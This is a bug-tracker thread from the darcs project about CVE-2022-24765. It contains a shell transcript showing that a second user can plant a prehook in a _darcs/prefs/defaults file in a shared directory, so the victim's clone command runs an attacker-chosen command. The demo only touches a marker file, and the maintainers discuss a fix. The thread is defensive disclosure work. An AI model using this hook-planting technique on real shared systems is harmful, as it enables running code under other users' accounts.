Issue 2690 CVE-2022-24765

Title CVE-2022-24765
Priority Status unknown
Milestone Resolved in
Superseder Nosy List gpiero
Assigned To

Created on 2022-04-13.07:14:10 by gpiero, last changed 2022-04-13.22:20:50 by bf.

msg22979 (view) Author: gpiero Date: 2022-04-13.07:14:09
darcs is (at least partially) vulnerable to this.

$ darcs --version
2.17.1 (+ 148 patches)
$ sudo useradd h4ck3r
$ whoami
$ mkdir -m 777 shared
$ darcs ini shared/R
WARNING: creating a nested repository.
Finished initializing repository.
$ sudo -u h4ck3r mkdir -p shared/_darcs/prefs
$ echo 'clone prehook touch /tmp/p4wn3d' | sudo -u h4ck3r tee shared/_darcs/prefs/defaults
clone prehook touch /tmp/p4wn3d
$ cd shared
shared $ ls /tmp/p4wn3d
ls: cannot access '/tmp/p4wn3d': No such file or directory
shared $ darcs clone R S
Prehook ran successfully.
WARNING: creating a nested repository.
Copying patches, to get lazy repository hit ctrl-C...
Finished cloning.
shared $ ls /tmp/p4wn3d

The prehook is (rightly) executed even if the command doesn't succeed.

shared $ darcs clone R not-existent/S
Prehook ran successfully.  <---
darcs: not-existent/S: createDirectory: does not exist (No such file or directory)

Anyway, at least in the case of `clone`, the attack only succeeds if the 
_darcs directory resides in the cwd.

shared $ cd ..
$ darcs clone shared/R shared/S
Directory or file named 'shared/S' already exists.

(no prehook run now).

Haven't investigated further combinations or commands (e.g. does `show 
repo` read the defaults file?)
msg22980 (view) Author: gpiero Date: 2022-04-13.07:26:15
* [Wed, Apr 13, 2022 at 07:14:10AM +0000] Gian Piero Carrubba:
>(e.g. does `show repo` read the defaults file?)

Guess so:

$ darcs help show repo | grep -c hook
msg22988 (view) Author: bf Date: 2022-04-13.22:20:50
Yes, every command reads the defaults file and can have hooks 
attached. How to fix this?

From https://github.blog/2022-04-12-git-security-vulnerability-
announced/ :

"Git v2.35.2 [...] changes Git’s behavior when looking for a top-
level .git directory to stop when its directory traversal changes 
ownership from the current user."

I guess we could do the same in darcs. Volunteers?
Date User Action Args
2022-04-13 07:14:10gpierocreate
2022-04-13 07:26:15gpierosetmessages: + msg22980
2022-04-13 22:20:50bfsetmessages: + msg22988